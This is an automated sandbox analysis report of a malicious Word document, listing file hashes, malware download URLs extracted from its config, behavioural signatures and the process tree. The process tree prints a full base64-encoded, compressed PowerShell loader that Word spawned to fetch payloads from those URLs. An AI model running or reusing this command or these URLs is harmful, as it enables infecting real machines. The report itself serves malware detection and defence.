Analysis
-
max time kernel
123s -
max time network
135s -
platform
windows10_x64 -
resource
win10-en-20211014 -
submitted
04-12-2021 02:36
Static task
static1
Behavioral task
behavioral1
Sample
a8ede5b4e9ad5f52a3c28142fa26a4c2caa2d9bd9e73aead41942d31986e4abe.doc
Resource
win10-en-20211104
Behavioral task
behavioral2
Sample
a8ede5b4e9ad5f52a3c28142fa26a4c2caa2d9bd9e73aead41942d31986e4abe.doc
Resource
win10-en-20211014
General
-
Target
a8ede5b4e9ad5f52a3c28142fa26a4c2caa2d9bd9e73aead41942d31986e4abe.doc
-
Size
91KB
-
MD5
8ab1eb11519d5a556284d0e6d006b331
-
SHA1
c4689ad2bd4082c3986c747ac25bfd9296097673
-
SHA256
a8ede5b4e9ad5f52a3c28142fa26a4c2caa2d9bd9e73aead41942d31986e4abe
-
SHA512
4c37f58286da386d51f66cc0033456bf76833ed33f8fd57949f767456f49b50769431a7ba413b0cec3260beb3d6f14fa3b6b54214841a21cfd53faa102752ab9
Malware Config
Extracted
http://oushyn.com/efV5qsN/
http://valentico.ru/fvxr/
http://algia.com.ar/L4E6sc/
http://klusmeier.de/s0UdPE/
http://zazz.com.br/UIrE4e/
Signatures
-
Process spawned unexpected child process 1 IoCs
This typically indicates the parent process was compromised via an exploit or macro.
description pid pid_target Process procid_target Parent C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE is not expected to spawn this process 3800 3584 PowersHeLL.exe 67 -
Blocklisted process makes network request 4 IoCs
flow pid Process 33 3800 PowersHeLL.exe 37 3800 PowersHeLL.exe 40 3800 PowersHeLL.exe 42 3800 PowersHeLL.exe -
Checks processor information in registry 2 TTPs 3 IoCs
Processor information is often read in order to detect sandboxing environments.
description ioc Process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString WINWORD.EXE Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 WINWORD.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz WINWORD.EXE -
Enumerates system info in registry 2 TTPs 3 IoCs
description ioc Process Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS WINWORD.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemFamily WINWORD.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU WINWORD.EXE -
Suspicious behavior: AddClipboardFormatListener 2 IoCs
pid Process 3584 WINWORD.EXE 3584 WINWORD.EXE -
Suspicious behavior: EnumeratesProcesses 3 IoCs
pid Process 3800 PowersHeLL.exe 3800 PowersHeLL.exe 3800 PowersHeLL.exe -
Suspicious use of AdjustPrivilegeToken 1 IoCs
description pid Process Token: SeDebugPrivilege 3800 PowersHeLL.exe -
Suspicious use of SetWindowsHookEx 7 IoCs
pid Process 3584 WINWORD.EXE 3584 WINWORD.EXE 3584 WINWORD.EXE 3584 WINWORD.EXE 3584 WINWORD.EXE 3584 WINWORD.EXE 3584 WINWORD.EXE -
Suspicious use of WriteProcessMemory 2 IoCs
description pid Process procid_target PID 3584 wrote to memory of 3800 3584 WINWORD.EXE 71 PID 3584 wrote to memory of 3800 3584 WINWORD.EXE 71
Processes
-
C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE"C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\a8ede5b4e9ad5f52a3c28142fa26a4c2caa2d9bd9e73aead41942d31986e4abe.doc" /o ""1⤵
- Checks processor information in registry
- Enumerates system info in registry
- Suspicious behavior: AddClipboardFormatListener
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:3584 -
C:\Windows\System32\WindowsPowerShell\v1.0\PowersHeLL.exePowersHeLL -e KAAgAG4AZQB3AC0ATwBCAEoARQBDAFQAIAAgAGkAbwAuAEMATwBtAFAAUgBFAHMAUwBpAE8ATgAuAGQARQBGAGwAQQB0AEUAcwB0AFIAZQBBAE0AKAAgAFsAcwB5AFMAVABFAE0ALgBpAG8ALgBtAEUATQBvAFIAeQBzAHQAUgBlAGEAbQBdACAAWwBDAE8ATgB2AGUAUgB0AF0AOgA6AEYAUgBPAE0AQgBBAFMARQA2ADQAUwB0AFIASQBOAGcAKAAgACcAVgBaAEIAdABUADgASQB3AEYARQBiAC8AUwBqADgAcwBHAFkAdgBTAFkAZwBRAE4ATgBDAFkAawBpAGcAWQBFAEoARQA0ADAARQBoAFAAVABkAFgAZQBzAHMAcgBYAFEARgBnAFkAagAvAEgAZQBMAHYAQwBSACsAYQBkAEsAZQA1ACsAVABlAHAAOQA1AGsAVQBKAFQAbQBGAGQAMABoAEMAVQBWAFYAUgBUAC8AQQBMAGQASgBNAHgAaQBxAG4AbgBoADYAVQB5AGUAUQAvAEMAagBmAEcAUQBvADYASABZAFAARQBIAFIAUABlAFoAQQBHAG0AcAAxADMAcwBwAFAAcgBVAEwAKwBxAG0AMQA4AHgAWQBoAGEAbQBuAFMAagBjAFIAYwA1AFEAUwBTADkAOABiAEMARABFAG4ANwBpAEYAWQBzAGMANAByAGcAQwB1AHMAbABTAFYAWgByAGYAUwBZAHMAbQB3AHEAMgBkAHoARABUAHAARgAvAHYAMwBCAGgAKwBaAHIATgBzAGEAWABJAFEAbwBIAEUATQB4AE4AVABHADgAYQBoAHoAWgBpAFUAcgB5AHoAOAB0ADAAbQBUAGMAMQBaADAANgBFAEIAKwBIADgAMAB6AFkAaQB0AC8AMgBBACsAcQB4AFkAbABMAGsAYgBqAHYAdgAwAEIAVgBMAFcATgB2AEsAMQBTAFYAcQBOAHEAOABiAHQAVgBzAFgAeQBCAGEAbQBwADAAZgA3AEIATQBoAFYAeQAvAFcAYgBvAHcAdgBrAGYALwBuAHUAUABNAHIAdQBpAG0ARQBOAFAAawAyAFUAQgBzAGIAVABpAHIAZAA0ADcAagA2AHAAUABoAEkAUwBIAGQAbwBIAFcANgBzADMAMgA4AE8AWAA0AFEAZABWAHkARQB5AHgAKwBGAEYAawBjAEkAcgBpAE4AeABWAGEATABlAFMAMABFAGwAeQBpADQAOABpAEEAaABwAFoAcABXAHgAMQBwAHgAYwBHAFkAMAB6AE8ATgAzAEoAQQBaADMAWABGAG0AZQBiAG8AdAB0AEwAQgBRAFQAWgBXAHgAeQBQAHYARwBuAFQAVwBIAHUAUgBWAEsANABvAEUAegAyAEIAVABvAGIAdgBjAEwAJwAgACkAIAAsACAAWwBJAG8ALgBDAE8AbQBQAHIAZQBTAFMAaQBPAE4ALgBDAE8AbQBQAFIARQBTAHMAaQBvAE4AbQBvAEQAZQBdADoAOgBEAEUAQwBPAG0AcABSAEUAUwBTACAAKQB8ACAARgBvAHIAZQBBAEMASAAtAG8AQgBqAGUAQwB0AHsAbgBlAHcALQBPAEIASgBFAEMAVAAgAHMAWQBzAHQARQBNAC4ASQBPAC4AcwB0AFIAZQBBAG0AcgBlAGEARABFAFIAKAAgACQAXwAsAFsAcwBZAHMAdABFAG0ALgB0AEUAeABUAC4ARQBuAGMAbwBEAGkAbgBnAF0AOgA6AGEAUwBjAEkASQAgACkAfQApAC4AcgBFAEEAZABUAG8AZQBOAEQAKAApACAAfAAgACYAIAAoACAAJABzAGgARQBsAGwAaQBkAFsAMQBdACsAJABzAGgARQBsAEwAaQBkAFsAMQAzAF0AKwAnAFgAJwApAA==2⤵
- Process spawned unexpected child process
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3800
-